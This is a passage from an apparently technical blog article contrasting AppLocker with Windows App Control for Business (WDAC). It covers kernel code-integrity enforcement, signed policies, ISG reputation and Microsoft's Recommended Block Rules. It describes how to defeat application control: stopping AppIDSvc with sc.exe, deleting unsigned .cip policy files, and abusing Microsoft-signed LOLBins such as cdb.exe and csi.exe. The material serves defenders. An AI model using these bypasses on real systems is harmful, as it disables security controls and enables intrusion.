&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;MSRC servicing-criteria language&lt;/td&gt;
&lt;td&gt;Microsoft Learn &lt;em&gt;App Control and AppLocker Overview&lt;/em&gt; [@ms-appcontrol-applocker-overview]&lt;/td&gt;
&lt;td&gt;AppLocker is not a security feature under MSRC criteria&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;User-mode &lt;code&gt;AppIDSvc&lt;/code&gt; architecture&lt;/td&gt;
&lt;td&gt;Microsoft Learn &lt;em&gt;AppLocker Architecture and Components&lt;/em&gt; [@ms-applocker-architecture]&lt;/td&gt;
&lt;td&gt;A &lt;code&gt;LocalSystem&lt;/code&gt; or admin attacker can stop the evaluator&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Public bypass corpora&lt;/td&gt;
&lt;td&gt;Oddvar Moe &lt;code&gt;UltimateAppLockerByPassList&lt;/code&gt; [@github-ultimateapplockerbypass]; Moe 2017 case study [@oddvarmoe-applocker-case-study]&lt;/td&gt;
&lt;td&gt;Demonstrated bypasses without admin against default rules&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Microsoft-org-hosted deployment baseline&lt;/td&gt;
&lt;td&gt;AaronLocker README, Aaron Margosis [@github-aaronlocker]&lt;/td&gt;
&lt;td&gt;Microsoft-employee-maintained tool states the scope identically&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;{`
// Pseudocode walk of what happens when an admin or LocalSystem process
// stops AppIDSvc. The actual demonstration requires admin on a Windows
// host; this is the logic the kernel minifilter follows.&lt;/p&gt;
&lt;p&gt;function onProcessCreate(candidateExe, callerToken) {
  const svc = queryService(&apos;AppIDSvc&apos;);
  if (svc.state !== &apos;Running&apos;) {
    // No evaluator. The minifilter cannot block on the verdict
    // because the verdict source is gone. Enforcement degrades.
    return ALLOW;
  }
  const verdict = svc.evaluate(candidateExe, callerToken);
  return verdict; // honoured by the kernel as ALLOW or DENY
}&lt;/p&gt;
&lt;p&gt;// After: sc.exe stop AppIDSvc  (requires admin / SYSTEM)
//   queryService(&apos;AppIDSvc&apos;).state === &apos;Stopped&apos;
//   onProcessCreate(...) returns ALLOW for every candidate
//   until AppIDSvc restarts (typically next reboot)
`}&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; AppLocker prevents non-admin end users from running unapproved software. That is the entire mission statement, and Microsoft says it directly. It is not a &lt;em&gt;weakness&lt;/em&gt; of AppLocker that an attacker with administrative rights can bypass it; that is &lt;em&gt;outside the threat model the product was designed against&lt;/em&gt;. The right question to ask of AppLocker is not &quot;is it secure?&quot; but &quot;is the threat model it addresses the threat model I need to address?&quot;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;If AppLocker cannot defend against an admin-equivalent attacker &lt;em&gt;by design&lt;/em&gt;, and that became obvious inside Microsoft by the early 2010s, the question is no longer &quot;why is AppLocker not enough?&quot; It is: &lt;em&gt;what would a Windows application-control system designed against an admin-equivalent attacker actually look like?&lt;/em&gt; Microsoft answered that question with Windows 10.&lt;/p&gt;
&lt;h2&gt;5. The Generational Pivot -- Configurable Code Integrity, WDAC, App Control for Business&lt;/h2&gt;
&lt;p&gt;With Windows 10, Microsoft introduces Device Guard. The framing in the official October 2017 retrospective is unusually candid for a Microsoft product communication: &lt;em&gt;&quot;With Windows 10 we introduced Windows Defender Device Guard&quot;&lt;/em&gt; -- and the new mechanism&apos;s &lt;em&gt;value proposition&lt;/em&gt;, the retrospective explains, is that its enforcement does not depend on a user-mode service an administrator can turn off [@ms-blog-introducing-wdac-2017]. Where AppLocker&apos;s &lt;code&gt;AppIDSvc&lt;/code&gt; evaluator can be stopped from a &lt;code&gt;LocalSystem&lt;/code&gt; shell, the new mechanism&apos;s evaluator lives in the kernel and validates its policy file cryptographically. Microsoft was not hiding what changed. Microsoft was announcing what changed.&lt;/p&gt;
&lt;p&gt;The 2014-2015 threat-model shift inside Microsoft is well documented in retrospect [@ms-blog-introducing-wdac-2017]. Post-&lt;a href=&quot;https://paragmali.com/blog/mimikatz-and-the-credential-theft-decade-the-windows-securit/&quot; rel=&quot;noopener&quot;&gt;Pass-the-Hash&lt;/a&gt;, post-APT, the working assumption was that the adversary reaches administrator quickly -- and that any control whose enforcement could be turned off by an administrator was therefore not, in itself, a defense against the modern adversary. AppLocker could not be retrofitted to defend against that model because its evaluator lives in user mode &lt;em&gt;by design&lt;/em&gt;. The fix was structural: build a peer mechanism in the kernel Code Integrity component.&lt;/p&gt;

The Windows kernel component that enforces signature and policy checks on every image loaded into memory. The same `ci.dll` enforces driver signing (KMCS) and Driver Signature Enforcement (DSE); the App Control for Business policy is a peer of the driver signing policy, evaluated by the same kernel code at the same hook points. There is no service to stop because there is no service -- the evaluator runs in the kernel itself.

The umbrella brand Microsoft used in 2015-2017 for a bundle of hardware-rooted security features that included HVCI and Configurable Code Integrity. The brand was retired because customers consistently believed the bundle required hardware that, in fact, only HVCI required. The configurable CI policy that was the application-control half of Device Guard is what Microsoft now calls App Control for Business [@ms-blog-introducing-wdac-2017].

The configuration in which the kernel CI evaluator runs inside a Virtualization-Based Security (VBS) enclave at Virtual Trust Level 1 (VTL1), separated from the normal kernel at VTL0 by the Windows hypervisor. The marketing name in Windows 11 Settings is *memory integrity* [@ms-hvci] [@ms-support-memory-integrity]. The companion HVCI article in this pipeline covers the mechanism in depth; for this article the relevant fact is that with HVCI on, even a kernel-mode attacker in VTL0 cannot tamper with the code-integrity decision.
&lt;p&gt;The connecting insight that made the architecture work: &lt;em&gt;do not&lt;/em&gt; fix AppLocker. Build a peer mechanism in &lt;code&gt;ci.dll&lt;/code&gt;, the same component that already enforces &lt;a href=&quot;https://paragmali.com/blog/windows-kernel-code-integrity-2006-2026/&quot; rel=&quot;noopener&quot;&gt;driver signing&lt;/a&gt;, and make the new application-control policy a peer of the driver-signing policy. The decision lives in the kernel. The policy file lives on disk under &lt;code&gt;%SystemRoot%\System32\CodeIntegrity\CiPolicies\Active\&lt;/code&gt;. There is no user-mode service to stop.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;The three-era naming timeline&lt;/strong&gt; is the question every practitioner asks first about this product, so it is worth laying out cleanly:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Era&lt;/th&gt;
&lt;th&gt;Name&lt;/th&gt;
&lt;th&gt;Released&lt;/th&gt;
&lt;th&gt;Source&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Launch&lt;/td&gt;
&lt;td&gt;Configurable Code Integrity, under the &lt;strong&gt;Device Guard&lt;/strong&gt; umbrella&lt;/td&gt;
&lt;td&gt;Windows 10 1507, July 29 2015&lt;/td&gt;
&lt;td&gt;[@ms-blog-introducing-wdac-2017]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Rename 1&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Windows Defender Application Control&lt;/strong&gt; (WDAC)&lt;/td&gt;
&lt;td&gt;Windows 10 1709 (Fall Creators Update GA October 17, 2017; WDAC rename announced October 23, 2017)&lt;/td&gt;
&lt;td&gt;[@ms-blog-introducing-wdac-2017]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Rename 2&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;App Control for Business&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Windows 11 24H2 / Server 2025, autumn 2024 [@ms-lifecycle-win11-enterprise] [@ms-lifecycle-server-2025]&lt;/td&gt;
&lt;td&gt;[@ms-appcontrol-applocker-overview] [@github-wdac-toolkit-issue-411]&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;

Microsoft&apos;s October 2017 retrospective is the cleanest explanation of the first rename [@ms-blog-introducing-wdac-2017]: the Device Guard umbrella *&quot;unintentionally left an impression for many customers that the two features were inexorably linked and could not be deployed separately&quot;* -- which Configurable CI and HVCI never were. The rename to WDAC was brand management, not a technology change. The 2024 rename to App Control for Business [@ms-appcontrol-applocker-overview] is similarly a rebrand; Microsoft Learn states *&quot;App Control for Business was originally released as part of Device Guard and called configurable code integrity. The terms &apos;Device Guard&apos; and &apos;configurable code integrity&apos; are no longer used with App Control except when deploying policies through Group Policy.&quot;* The same kernel code path has worn three names in nine years.
&lt;p&gt;&lt;strong&gt;The naming convention this article uses&lt;/strong&gt;: lead with &quot;App Control for Business (still widely called WDAC)&quot; on first mention, then use the names interchangeably. The community search term &quot;WDAC&quot; stays in the title and tags because most practitioner content still uses it.&lt;/p&gt;

flowchart TD
    Kernel[&quot;Kernel CI evaluator (ci.dll)&lt;br /&gt;peer of driver signing / DSE / KMCS&lt;br /&gt;unchanged 2015 -- 2026&quot;]
    Brand1[&quot;Configurable Code Integrity&lt;br /&gt;under Device Guard umbrella&lt;br /&gt;(Windows 10 1507, 2015)&quot;]
    Brand2[&quot;Windows Defender Application Control (WDAC)&lt;br /&gt;(Windows 10 1709, 2017)&quot;]
    Brand3[&quot;App Control for Business&lt;br /&gt;(Windows 11 24H2 / Server 2025, 2024)&quot;]
    Brand1 --&amp;gt; Kernel
    Brand2 --&amp;gt; Kernel
    Brand3 --&amp;gt; Kernel
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; In 2026, &quot;WDAC&quot; remains the more discoverable community-search term for the kernel CI policy mechanism. Microsoft Learn redirects from the old &lt;code&gt;windows-defender-application-control/&lt;/code&gt; URL path to the new &lt;code&gt;app-control-for-business/&lt;/code&gt; path, but third-party blogs, conference talks, and the bypass corpora all still use &quot;WDAC&quot;. If you are searching, use both terms.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;A peer mechanism in the kernel CI component is a deliberate, specific architectural choice. What does App Control for Business &lt;em&gt;actually&lt;/em&gt; check at policy-evaluation time, and what makes its policy itself tamper-resistant against a &lt;code&gt;SYSTEM&lt;/code&gt;-equivalent attacker?&lt;/p&gt;
&lt;h2&gt;6. The Mechanism in Detail -- How App Control for Business Actually Enforces&lt;/h2&gt;
&lt;p&gt;A &lt;code&gt;LoadImage&lt;/code&gt; callback enters the kernel. Where does the policy decision happen, who reads the policy file, and what stops the attacker from just deleting or replacing the policy file?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Where it runs.&lt;/strong&gt; Inside &lt;code&gt;ci.dll&lt;/code&gt;, loaded by the Windows kernel. The same component that enforces driver signing / DSE / KMCS [@ms-hvci]. The callback path is the documented kernel API surface: &lt;code&gt;PsSetLoadImageNotifyRoutine&lt;/code&gt; [@ms-pssetloadimagenotifyroutine] registers the image-load callback, and &lt;code&gt;PsLookupProcessByProcessId&lt;/code&gt; [@ms-pslookupprocessbyprocessid] resolves the loading PID to an &lt;code&gt;EPROCESS&lt;/code&gt; so the evaluator can attribute the load to the right process. A user-mode &lt;code&gt;sc.exe stop&lt;/code&gt; has no effect because there is &lt;em&gt;no service to stop&lt;/em&gt;. The evaluator is the kernel.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;What it evaluates.&lt;/strong&gt; For each candidate image, &lt;code&gt;ci.dll&lt;/code&gt; checks:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;The file&apos;s &lt;strong&gt;Authenticode signature&lt;/strong&gt; -- signer subject, EKU (Extended Key Usage), leaf certificate attributes.&lt;/li&gt;
&lt;li&gt;The file&apos;s &lt;strong&gt;signed metadata&lt;/strong&gt; -- Original Filename, version, product name (analogous to AppLocker&apos;s Publisher rule).&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;SHA-1, SHA-256, and page hashes&lt;/strong&gt; of the file content.&lt;/li&gt;
&lt;li&gt;The file&apos;s &lt;strong&gt;path&lt;/strong&gt;, introduced in Windows 10 1903, with a mandatory runtime user-writeability check that distinguishes App Control path rules from AppLocker&apos;s [@github-aaronlocker-script]. An App Control path rule that resolves to a directory writable by a non-administrator is rejected at evaluation time.&lt;/li&gt;
&lt;li&gt;The file&apos;s &lt;strong&gt;Managed Installer lineage&lt;/strong&gt; -- whether the file was written by a process tagged as a managed installer [@ms-appcontrol-managed-installer].&lt;/li&gt;
&lt;li&gt;The file&apos;s &lt;strong&gt;ISG reputation&lt;/strong&gt; -- covered in section 7 [@ms-appcontrol-isg].&lt;/li&gt;
&lt;/ul&gt;

The XML / binary `.cip` policy file that `ci.dll` consults at every image-load callback. Authored in XML via the `New-CIPolicy` and `Merge-CIPolicy` cmdlets (the `ConfigCI` PowerShell module) and compiled to a binary `.cip` via `ConvertFrom-CIPolicy`. The kernel reads the active policies from `%SystemRoot%\System32\CodeIntegrity\CiPolicies\Active\*.cip` at boot and on policy refresh.

A trust-propagation feature in App Control. An administrator designates a process (typically a configuration-management agent such as Configuration Manager, Intune, or a third-party tool such as Patch My PC) as a *managed installer*. Any file written by that process is automatically tagged with an Extended Attribute marking it as installed by trusted infrastructure. App Control policy can then allow files bearing the tag. The Managed Installer rule collection is implemented as an AppLocker rule set [@ms-appcontrol-managed-installer], which is the most-cited example of AppLocker enforcement plumbing being reused by App Control rather than replaced.
&lt;p&gt;&lt;strong&gt;Policy file format.&lt;/strong&gt; XML in, binary in the kernel. The cmdlet sequence:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;New-CIPolicy   -&amp;gt; Merge-CIPolicy -&amp;gt; ConvertFrom-CIPolicy -&amp;gt; .cip file -&amp;gt; drop into Active/ -&amp;gt; reboot or refresh
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The PowerShell module that exposes these cmdlets is still partly named after the WDAC era. &lt;code&gt;ConvertFrom-CIPolicy&lt;/code&gt;, &lt;code&gt;Set-CIPolicySetting&lt;/code&gt;, &lt;code&gt;Set-CIPolicyVersion&lt;/code&gt;, &lt;code&gt;Add-SignerRule&lt;/code&gt;, and the rest all retain the &lt;em&gt;CIPolicy&lt;/em&gt; / &lt;em&gt;ConfigCI&lt;/em&gt; naming through the 2024 rebrand. Microsoft has not renamed the cmdlets to &lt;em&gt;App Control for Business&lt;/em&gt;. The App Control Wizard [@ms-appcontrol-wizard] is an open-source MSIX-packaged C# tool that uses these same cmdlets under the hood.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Signed vs unsigned policies -- the load-bearing distinction.&lt;/strong&gt; This is the single most common practitioner confusion in App Control deployments, and it is worth several paragraphs of care.&lt;/p&gt;
&lt;p&gt;An &lt;strong&gt;unsigned&lt;/strong&gt; App Control policy is fully supported and widely deployed. The policy XML is authored, compiled, and dropped into the active-policies directory. The kernel reads it and enforces it. But the policy file itself has no cryptographic binding to the device. Any process with write access to &lt;code&gt;%SystemRoot%\System32\CodeIntegrity\CiPolicies\Active\&lt;/code&gt; -- which includes anything running as &lt;code&gt;SYSTEM&lt;/code&gt; or administrator -- can simply &lt;code&gt;del&lt;/code&gt; the &lt;code&gt;.cip&lt;/code&gt; file and reboot. Enforcement vanishes. The defect is not in &lt;code&gt;ci.dll&lt;/code&gt;; it is in the policy not being signed.&lt;/p&gt;
&lt;p&gt;A &lt;strong&gt;signed&lt;/strong&gt; App Control policy is signed by the &lt;strong&gt;deploying organisation&apos;s&lt;/strong&gt; code-signing certificate -- &lt;em&gt;not&lt;/em&gt; by the application publisher&apos;s certificate, which is the misconception most often imported from the AppLocker mental model. The deploying organisation typically uses an internal PKI leaf, the signing private key kept on a hardware token or in a sealed key vault. When the policy is signed, the kernel CI evaluator validates the signature against the trusted signer set baked into the policy at first application; a subsequent attempt to remove or replace the &lt;code&gt;.cip&lt;/code&gt; file is rejected at boot because the unsigned (or alternately-signed) replacement does not match. Even &lt;code&gt;SYSTEM&lt;/code&gt; cannot bypass this without the corresponding private key. This is the &lt;em&gt;only&lt;/em&gt; configuration that survives an admin-equivalent attacker.&lt;/p&gt;

App Control policies are signed by the deploying organisation&apos;s code-signing certificate, *not* by the application publisher&apos;s. The signed policy is bound to the device such that even `SYSTEM` cannot remove or replace it without the organisation&apos;s signing key.
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Dimension&lt;/th&gt;
&lt;th&gt;Unsigned policy&lt;/th&gt;
&lt;th&gt;Signed policy&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Tamper-resistance against &lt;code&gt;SYSTEM&lt;/code&gt; / admin&lt;/td&gt;
&lt;td&gt;None -- the &lt;code&gt;.cip&lt;/code&gt; file can be deleted&lt;/td&gt;
&lt;td&gt;Strong -- removal requires the signing key&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Deployment complexity&lt;/td&gt;
&lt;td&gt;Low -- copy file and reboot&lt;/td&gt;
&lt;td&gt;High -- requires PKI, signing infra, key custody&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Signing PKI requirement&lt;/td&gt;
&lt;td&gt;None&lt;/td&gt;
&lt;td&gt;Internal code-signing CA leaf required&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Removal mechanism&lt;/td&gt;
&lt;td&gt;&lt;code&gt;del *.cip&lt;/code&gt; + reboot&lt;/td&gt;
&lt;td&gt;Sign and deploy a &lt;em&gt;replace&lt;/em&gt; policy with the same key&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Suitable as MSRC security boundary&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;Yes (with HVCI on)&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;&lt;strong&gt;HVCI integration.&lt;/strong&gt; When &lt;a href=&quot;https://paragmali.com/blog/the-windows-secure-kernel/&quot; rel=&quot;noopener&quot;&gt;Virtualization-Based Security&lt;/a&gt; is on, the kernel CI evaluator itself runs in VTL1 inside &lt;strong&gt;&lt;a href=&quot;https://paragmali.com/blog/wdac--hvci-code-integrity-at-every-layer-in-windows/&quot; rel=&quot;noopener&quot;&gt;HVCI&lt;/a&gt;&lt;/strong&gt; (memory integrity, in Windows 11 Settings) [@ms-hvci] [@ms-support-memory-integrity]. A kernel-mode attacker in VTL0 -- even one who has loaded an arbitrary kernel driver and corrupted kernel memory at will -- cannot tamper with the code-integrity evaluation path. The decision lives behind the hypervisor boundary.&lt;/p&gt;

Virtual Trust Levels exposed by the Windows hypervisor. VTL0 is the normal Windows kernel and user mode. VTL1 is the *secure kernel*, an isolated execution environment with restricted memory access and a tighter trust model. With HVCI enabled, the code-integrity evaluator runs in VTL1; a kernel-mode attacker confined to VTL0 cannot read or write VTL1 memory directly. Companion HVCI article in this pipeline covers the VTL model in depth.

sequenceDiagram
    participant P as Loading process
    participant K as Kernel image loader
    participant CI as ci.dll (CI evaluator)
    participant Pol as Active .cip policies
    P-&amp;gt;&amp;gt;K: load module foo.dll
    K-&amp;gt;&amp;gt;CI: PsSetLoadImageNotifyRoutine callback
    CI-&amp;gt;&amp;gt;CI: parse Authenticode + compute hashes + check path
    CI-&amp;gt;&amp;gt;Pol: match against signer / hash / path / MI / ISG rules
    Pol--&amp;gt;&amp;gt;CI: allow or deny
    CI--&amp;gt;&amp;gt;K: honour verdict
    K--&amp;gt;&amp;gt;P: image loaded or STATUS_INVALID_IMAGE_HASH

flowchart LR
    subgraph VTL0[&quot;VTL0 -- normal Windows kernel&quot;]
        K0[&quot;NTOS kernel&quot;]
        Drv[&quot;Loaded drivers&quot;]
        Att[&quot;kernel-mode attacker&quot;]
    end
    subgraph VTL1[&quot;VTL1 -- secure kernel&quot;]
        SK[&quot;Secure kernel&quot;]
        CIeval[&quot;ci.dll evaluator&quot;]
    end
    Hyper[&quot;Windows Hypervisor (VBS)&quot;]
    K0 -- regulated calls --&amp;gt; Hyper
    Hyper -- mediated entry --&amp;gt; SK
    SK --&amp;gt; CIeval
    Att -. blocked .- Hyper
&lt;p&gt;&lt;strong&gt;Multi-policy support.&lt;/strong&gt; From Windows 10 1903 (May 2019) the kernel supported up to 32 active App Control policies whose interactions follow two distinct rules: multiple base policies &lt;em&gt;intersect&lt;/em&gt; (an app must be allowed by every base policy that applies), while a base policy and its supplemental policies &lt;em&gt;union&lt;/em&gt; (an app is allowed if any of them allow it), and deny rules always win in either combination. The cap was &lt;strong&gt;lifted&lt;/strong&gt; by the April 9, 2024 cumulative security updates: &lt;strong&gt;KB5036893&lt;/strong&gt; for Windows 11 22H2 and 23H2 (OS Builds 22621.3447 and 22631.3447) [@ms-kb-5036893], and &lt;strong&gt;KB5036892&lt;/strong&gt; for Windows 10 21H2 and 22H2 (OS Builds 19044.4291 and 19045.4291) [@ms-kb-5036892]. Microsoft&apos;s &lt;em&gt;Deploy multiple App Control for Business policies&lt;/em&gt; page is explicit on the version scope [@ms-appcontrol-multi-policy]: &lt;em&gt;&quot;The policy limit was not removed on Windows 11 21H2 and will remain limited to 32 policies.&quot;&lt;/em&gt; No published Microsoft documentation gives the new ceiling on the platforms where the cap was lifted; the practical limit is policy parsing time at boot.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; This is the single most common practitioner misreading in App Control deployments. An unsigned App Control policy enforces against userland and against unprivileged users perfectly well -- but it does &lt;em&gt;not&lt;/em&gt; qualify as a security boundary under the MSRC servicing criteria, because an admin or &lt;code&gt;SYSTEM&lt;/code&gt; attacker can delete the policy file. The phrase &lt;em&gt;&quot;deploy WDAC&quot;&lt;/em&gt; alone is ambiguous; the meaningful phrase is &lt;em&gt;&quot;deploy a signed WDAC policy with HVCI on and the Recommended Block Rules merged in&quot;&lt;/em&gt;.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Kernel evaluator, signed policy, HVCI-isolated evaluator, multi-policy merge. That is &lt;em&gt;the security boundary&lt;/em&gt; Microsoft sells. But none of those facts tells you what &lt;em&gt;signals&lt;/em&gt; the policy can act on -- and one of those signals (ISG) is the single most misunderstood piece of the App Control vocabulary.&lt;/p&gt;
&lt;h2&gt;7. ISG -- The Reputation Signal Everyone Calls a List&lt;/h2&gt;
&lt;p&gt;Open any practitioner thread about App Control in 2024-2026 and you will see the phrase &lt;em&gt;&quot;the ISG list of trusted apps.&quot;&lt;/em&gt; There is no such list. Microsoft has said so for years. The misconception is institutional.&lt;/p&gt;
&lt;p&gt;The verbatim Microsoft Learn quote, from the &lt;em&gt;Use App Control with the Intelligent Security Graph&lt;/em&gt; page [@ms-appcontrol-isg]:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;The ISG isn&apos;t a &quot;list&quot; of apps. Rather, it uses the same vast security intelligence and machine learning analytics that power Microsoft Defender SmartScreen and Microsoft Defender Antivirus to help classify applications as having &quot;known good,&quot; &quot;known bad,&quot; or &quot;unknown&quot; reputation. This cloud-based AI is based on trillions of signals collected from Windows endpoints and other data sources, and processed every 24 hours.&lt;/p&gt;
&lt;/blockquote&gt;

The ISG isn&apos;t a &apos;list&apos; of apps. -- Microsoft Learn, *Use App Control with the Intelligent Security Graph* [@ms-appcontrol-isg]
&lt;p&gt;ISG is a &lt;em&gt;reputation classifier.&lt;/em&gt; An App Control policy can be configured to treat ISG&apos;s &lt;em&gt;&quot;known good&quot;&lt;/em&gt; verdict as an additive allow signal. ISG never blocks on App Control&apos;s behalf. The Microsoft Learn page is precise: &lt;em&gt;&quot;the ISG option only allows binaries that are known good. If a binary is unknown or known bad, it won&apos;t be allowed by the ISG&quot;&lt;/em&gt; [@ms-appcontrol-isg]. The classifier sits underneath the policy&apos;s explicit rules; it does not override them.&lt;/p&gt;

A Microsoft cloud service that ingests telemetry from Defender SmartScreen, Defender Antivirus, and partner products and produces a reputation classification for individual binaries. The classifier returns one of *known good*, *known bad*, or *unknown*. App Control can be configured to treat *known good* as an additional allow path, in addition to the explicit signer / hash / path / Managed Installer rules in the policy. ISG never *blocks* on its own; *unknown* and *known bad* simply mean ISG does not vote allow [@ms-appcontrol-isg].
&lt;p&gt;&lt;strong&gt;The mechanism.&lt;/strong&gt; When ISG is enabled and a binary is classified &lt;em&gt;known good&lt;/em&gt;, Windows tags the file with an Extended Attribute named &lt;code&gt;$KERNEL.SMARTLOCKER.ORIGINCLAIM&lt;/code&gt;, so the CI evaluator can honour the verdict at subsequent image loads without a fresh cloud call. The cloud reputation model itself is processed every 24 hours [@ms-appcontrol-isg]; App Control&apos;s client-side requeries are documented only as &lt;em&gt;periodic&lt;/em&gt;, without a fixed interval. The policy option &lt;code&gt;Enabled:Invalidate EAs on Reboot&lt;/code&gt; discards the tags across reboot, forcing a re-evaluation.&lt;/p&gt;
&lt;p&gt;The extended attribute &lt;code&gt;\$KERNEL.SMARTLOCKER.ORIGINCLAIM&lt;/code&gt; is the same EA-tag mechanism the Managed Installer feature uses to propagate the &quot;installed by trusted infrastructure&quot; signal [@ms-appcontrol-managed-installer]. Two adjacent App Control features therefore share the same persistence layer -- one populated by a local trusted-process designation, the other populated by a cloud reputation classifier. The kernel evaluator does not care which source wrote the tag.&lt;/p&gt;
&lt;p&gt;The misconception this section closes is that ISG is a &lt;em&gt;list&lt;/em&gt; of curated allowed apps -- a corporate-managed allowlist administered by Microsoft. It is not. The original &lt;code&gt;00-input.md&lt;/code&gt; for this article framed ISG as &lt;em&gt;&quot;cloud-reputation-driven allow-listing&quot;&lt;/em&gt;, which is half-true in spirit and wrong in mechanism. ISG is &lt;em&gt;reputation&lt;/em&gt;. The allow&lt;em&gt;list&lt;/em&gt; is what the App Control policy still has to author explicitly.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The phrase &lt;em&gt;Intelligent Trusted List&lt;/em&gt; and the acronym &lt;em&gt;ITL&lt;/em&gt; surface periodically in AI summaries and in third-party blog posts that describe App Control features. &lt;strong&gt;No such Microsoft feature exists.&lt;/strong&gt; A search of Microsoft Learn produces zero results; the URLs cited by AI summaries return 404; and the definitions offered by AI summaries contradict each other. The closest real Microsoft features are ISG (this section), the Microsoft Recommended Block Rules (section 8), and Smart App Control (section 9). If you see &lt;em&gt;ITL&lt;/em&gt; in a security blog, treat it as a fabrication and ignore it.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;ISG turns an App Control policy into a hybrid: explicit rules plus a reputation tap. But it is still an allowlist, and an allowlist has a structural ceiling. Microsoft itself published the consequence as a &lt;em&gt;block&lt;/em&gt; list. Why?&lt;/p&gt;
&lt;h2&gt;8. The Bypass Reality -- Recommended Block Rules and the LOLBin Corpus&lt;/h2&gt;
&lt;p&gt;Microsoft&apos;s own Microsoft Learn page lists approximately forty Microsoft-signed binaries that can bypass an App Control allow rule on themselves. The page is called &lt;em&gt;Applications that can bypass App Control and how to block them&lt;/em&gt; [@ms-appcontrol-bypass]. Why does Microsoft publish a list of its own bypassable signed binaries?&lt;/p&gt;
&lt;p&gt;Because if your App Control policy says &lt;em&gt;&quot;allow Microsoft-signed code&quot;&lt;/em&gt;, then it admits each of those forty binaries -- and each one is a way to run attacker-supplied code while complying with the policy. The publisher gate cannot evaluate side effects.&lt;/p&gt;

A binary already present on the operating system, typically signed by the OS vendor, that an attacker can repurpose to perform actions a security control would otherwise block. The canonical Windows LOLBin classes are script interpreters bundled with the OS or runtime (`mshta.exe`, `wscript.exe`), build tools that compile and execute attacker-supplied source (`msbuild.exe`, `csi.exe`, `dotnet.exe`), debuggers that script their own target (`cdb.exe`, `windbg.exe`), and registration utilities that load arbitrary DLLs into a signed host (`regsvr32.exe`, `rundll32.exe`). The community-curated LOLBAS Project [@lolbas-project] catalogues hundreds.
&lt;p&gt;The named-researcher chain that drove the Recommended Block Rules is a who-is-who of mid-2010s Windows offensive research:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;&lt;code&gt;cdb.exe&lt;/code&gt;&lt;/strong&gt; -- Matt Graeber, August 2016, preserved in the Wayback Machine [@exploit-monday-cdb-wayback]. The Windows debugger ships signed by Microsoft and includes a scripting facility that runs arbitrary shellcode in memory. Graeber&apos;s blog post asked, in his own words, &lt;em&gt;&quot;what is a tool that&apos;s signed by Microsoft that will execute code, preferably in memory?&quot;&lt;/em&gt; and answered &lt;em&gt;&quot;WinDbg/CDB of course!&quot;&lt;/em&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;&lt;code&gt;csi.exe&lt;/code&gt;&lt;/strong&gt; -- Casey Smith, September 2016, preserved in the Wayback Machine [@subt0x10-csi-wayback]. The C# interactive compiler, distributed with Visual Studio, is signed by Microsoft and runs arbitrary C# fragments via &lt;code&gt;Assembly.Load()&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;&lt;code&gt;dnx.exe&lt;/code&gt;&lt;/strong&gt; -- Matt Nelson, November 2016 [@enigma0x3-dnx-2016]. The early .NET Core host that loads and executes arbitrary .NET assemblies under a signed Microsoft binary.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;&lt;code&gt;addinprocess.exe&lt;/code&gt; / &lt;code&gt;addinprocess32.exe&lt;/code&gt;&lt;/strong&gt; -- James Forshaw, July 2017 [@tiraniddo-dg-2017]. The Visual Studio add-in host that can be coerced into loading an attacker DLL while the parent process satisfies the signed-publisher policy.&lt;/li&gt;
